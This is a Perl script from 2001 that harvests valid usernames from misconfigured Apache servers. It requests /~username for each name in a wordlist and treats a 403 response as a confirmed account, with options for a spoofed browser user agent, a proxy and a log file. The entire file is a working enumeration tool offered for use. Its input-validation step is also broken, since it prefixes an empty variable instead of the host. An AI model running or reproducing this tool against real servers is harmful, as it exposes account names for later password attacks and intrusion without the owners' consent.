#!/usr/bin/perl
#
#
# @2001M.eiszner mei@websec.org
# harvests users from badly configured
# apache server by requesting /~[username]
#
# if server responds Forbidden => user exists
# if server responds Not Found => NOT
#
########################################

use strict;
use Getopt::Std;
use LWP::UserAgent;
use HTTP::Request::Common;
use HTTP::Response;

## get options
##
use vars qw($opt_h $opt_u $opt_m $opt_p $opt_l);
getopts("h:u:m:p:l:");

## vardecs
##
my $host = $opt_h;
my $userfile = $opt_u;
my $method = $opt_m || "HEAD";
my $proxy = $opt_p;
my $logfile = $opt_l;
my $url = "";

## check that
##
if (!$host || !$userfile)
{
print "\nusage: $0 -h [host]\n\t-u [usernameFile]";
print "\n\t-m [method (default=HEAD)]\n\t-p [proxyServer]\n\n";
exit 11;
}

## input validation
##

if ($url !~ /http:\/\//i && $url !~ /https:\/\//i)
{
$url = "http://".$url;
}
$url =~ s/[\n\r]//g;

## create user-agent
##

my $response;
my $ua = new LWP::UserAgent;
$ua->agent("Mozilla/4.0(compatible;MSIE 6.0;Windows NT 5.0)");
$ua->proxy('http', $proxy) if($proxy ne '');

## resultfile
if ($logfile ne '')
{
open (RF, "> $logfile") || die "cant open $logfile !?!\n";
print RF "host: $host\n\n";
}

## userloop
open (UF, "< $userfile") || die "cant open $userfile !?!\n";

while(<UF>)
{
## username
##
my $uid = $_;
$uid =~ s/[\n\r]//g;

## url
##
my $url = $host."/~".$uid;

my $request = HTTP::Request->new($method, $url);
$response = $ua->request($request);

my $code = $response->code();

## code 403=forbidden
## thats what we are herefor
##
if ($code eq "403")
{
print "$uid *** USERNAME FOUND ***\n";
print RF "$uid *** USERNAME FOUND ***\n" if ($logfile ne '');
}
else
{
print "$uid $code\n";
print RF "$uid $code\n" if ($logfile ne '');
}

} # enduserloop

close (UF);
close (RF) if ($logfile ne '');